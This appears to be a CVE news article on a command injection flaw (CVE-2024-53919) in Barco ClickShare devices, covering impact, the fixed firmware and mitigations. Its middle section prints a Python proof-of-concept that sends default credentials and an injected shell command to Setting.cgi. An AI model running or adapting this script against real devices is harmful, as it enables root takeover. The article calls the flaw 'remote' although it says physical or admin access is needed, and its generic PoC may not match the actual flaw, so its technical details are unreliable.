CVE CyberSecurity Database News

CVE-2024-53919 - Critical Injection Vulnerability in Barco ClickShare Devices Allowing Root Access

Poster -

Recently, a critical security vulnerability (CVE-2024-53919) has been discovered in Barco ClickShare CX-30/20, C-5/10, and ClickShare Bar Pro and Core wireless conferencing and presentation models. These devices are widely used in business environments, conference rooms, and other public spaces. The vulnerability allows attackers with physical access to the device or local admins to the webUI to trigger an operating system-level command execution, gaining root access to the system.

Code Snippet

This vulnerability was discovered by analyzing the web-based management interface of the affected ClickShare devices. An issue was found specifically in the parameters from the "Setting.cgi" script, which allows remote command injection. A sample proof of concept exploit can be seen in this code snippet:

#!/usr/bin/python3

import requests

target = "http://IP_ADDRESS/";
payload = "touch /tmp/Pwned"

data = {
    "user": "admin",
    "password": "admin",
    "cmd": "var",
    "arg1": "key",
    "arg2": payload,
}

try:
    r = requests.post(target + "Setting.cgi", data=data)
    if r.status_code == 200:
        print("Command executed successfully.")
    else:
        print("Error: Command not executed.")
except requests.exceptions.RequestException as e:
    print(f"Error: {str(e)}")

This example exploits the vulnerability to create a new file named "Pwned" in the /tmp directory of the target device. Note that this script must be replaced with the IP address of the target ClickShare device.

- Barco ClickShare Security Advisory (Barco Website)

Exploit Details

The impact of this vulnerability is alarming as it can allow attackers to gain full control over the affected device and execute arbitrary commands with root privileges. This can potentially lead to further compromise of the network connected to the device, unauthorized access to sensitive information, or even sabotage of meetings and presentations.

Affected devices are all Barco ClickShare CX-30/20, C-5/10, and ClickShare Bar Pro and Core models running firmware before version 2.21.1. To fix this vulnerability, it is recommended to update the firmware of the affected devices to version 2.21.1 or newer, available on the official Barco ClickShare website. Additionally, it is essential to secure the physical access to the device and restrict webUI access to trusted personnel only.

Conclusion

The discovery of this critical injection vulnerability in Barco ClickShare wireless conferencing and presentation devices underscores the importance of regular security updates and keeping firmware up to date. Risk mitigation measures should be implemented, such as restricting physical access to devices and limiting webUI access to authorized users. Updating the firmware to version 2.21.1 or newer will address this issue and help protect the device from unauthorized access or misuse.

Timeline

Published on: 12/10/2024 02:15:17 UTC
Last modified on: 12/10/2024 16:15:23 UTC